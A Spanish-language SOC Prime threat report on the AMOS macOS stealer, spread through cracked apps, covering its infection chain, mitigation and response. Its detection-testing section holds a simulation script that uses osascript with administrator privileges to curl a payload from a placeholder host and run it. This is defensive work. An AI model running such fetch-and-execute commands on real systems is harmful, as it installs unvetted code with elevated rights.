SOC Prime Bias: Medio

08 May 2026 15:45 UTC

AMOS Stealer Apunta a macOS a Través de Aplicaciones “Crackeadas”

Author Photo
SOC Prime Team linkedin icon Seguir
AMOS Stealer Apunta a macOS a Través de Aplicaciones “Crackeadas”
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

El informe describe una campaña que distribuye Atomic macOS Stealer (AMOS) disfrazándolo como aplicaciones crackeadas o instruyendo a los usuarios a ejecutar comandos de terminal mediante copiar y pegar. Una vez ejecutado, el malware recopila un amplio conjunto de datos sensibles, incluyendo credenciales, información del navegador, billeteras de criptomonedas, archivos de aplicaciones de mensajería, perfiles de VPN y documentos personales, luego exfiltra el contenido robado a través de HTTP o HTTPS. Para evitar la detección estática, los operadores rotan dominios y URLs a lo largo de la campaña. La actividad está dirigida a usuarios de macOS, particularmente aquellos que buscan software no oficial o pirateado.

Investigación

Se utilizó telemetría de Trend Vision One para reconstruir toda la cadena de infección, comenzando con descargas de aplicaciones crackeadas desde haxmac.cc, seguido de redirección a través de dominios intermediarios, ejecución de scripts de shell maliciosos, creación de launch daemons para persistencia, preparación de datos en /tmp, compresión en archivos ZIP, y exfiltración a dominios controlados por atacantes que rotan. Los investigadores capturaron las líneas de comando relevantes, rutas de archivo e indicadores de comportamiento asociados con cada etapa del compromiso.

Mitigación

Las organizaciones deben educar a los usuarios sobre los riesgos del software crackeado y los comandos de terminal copiar y pegar, hacer cumplir los controles de Gatekeeper y notarización, y limitar la ejecución innecesaria de scripts en sistemas macOS. Los defensores también deben monitorizar la actividad sospechosa de curl and osascript y bloquear el acceso a dominios IPs maliciosos conocidos. Las detecciones en los endpoints deberían centrarse en la creación no autorizada de launch daemon, colocación oculta de archivos y comportamiento inusual de recopilación o exfiltración de archivos.

Respuesta

Si se detecta actividad de AMOS, se debe aislar el endpoint afectado, terminar los procesos maliciosos, eliminar archivos ocultos como .helper, .agent, y com.finder.helper.plist, y borrar cualquier dato preparado para la exfiltración. Las credenciales comprometidas deben ser revocadas, y se debe realizar un análisis forense en los archivos recuperados. La infraestructura maliciosa identificada debe ser bloqueada, y los contenidos de detección deben ser actualizados para monitorizar los patrones de comando observados.

Flujo de Ataque

Ejecución de Simulación

Prerrequisito: La Verificación de Telemetría y Línea Base Pre-vuelo debe haber sido aprobada.

Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narración DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados conducirán a diagnósticos erróneos.

  • Narrativa de Ataque y Comandos:
    Un adversario ha obtenido un señuelo de phishing que entrega una carga útil de AppleScript corta. El script usa osascript para ejecutar un comando de shell (sh -c) que invoca curl para descargar el binario del AMOS stealer desde un servidor C2 malicioso, lo guarda en el ~/Library/Application Support/ del usuario, y luego lo ejecuta con permisos elevados. El uso de osascript (un binario firmado por Apple) enmascara la actividad como una automatización legítima, mientras que curl proporciona una descarga de red sigilosa.

  • Script de Prueba de Regresión:

    # amos_stealer_simulation.sh
    # Simula la ejecución del AMOS stealer en macOS usando osascript + curl
    
    # 1. Definir URL malicioso (usar un marcador de posición inofensivo por seguridad)
    MALICIOUS_URL="https://example.com/malicious_payload.sh"
    
    # 2. Script de Apple que ejecuta un comando de shell para descargar y ejecutar la carga útil
    APPLESCRIPT=$(cat <<'EOF'
    do shell script "sh -c 'curl -s -o /tmp/payload.sh "https://example.com/malicious_payload.sh" && chmod +x /tmp/payload.sh && /tmp/payload.sh'" with administrator privileges
    EOF
    )
    
    # 3. Ejecutar el AppleScript a través de osascript
    echo "$APPLESCRIPT" | osascript
    
    # 4. Pausar brevemente para permitir que la carga útil se ejecute
    sleep 5
  • Comandos de Limpieza:

    # cleanup_amos_simulation.sh
    # Remover los artefactos creados por la simulación
    
    # Eliminar la carga útil descargada
    rm -f /tmp/payload.sh
    
    # Revocar cualquier proceso elevado temporal (si todavía está corriendo)
    pkill -f "/tmp/payload.sh" || true
    
    # Opcionalmente, borrar el historial de ejecución del AppleScript
    # (macOS no retiene un historial persistente para osascript)
    echo "Limpieza completa."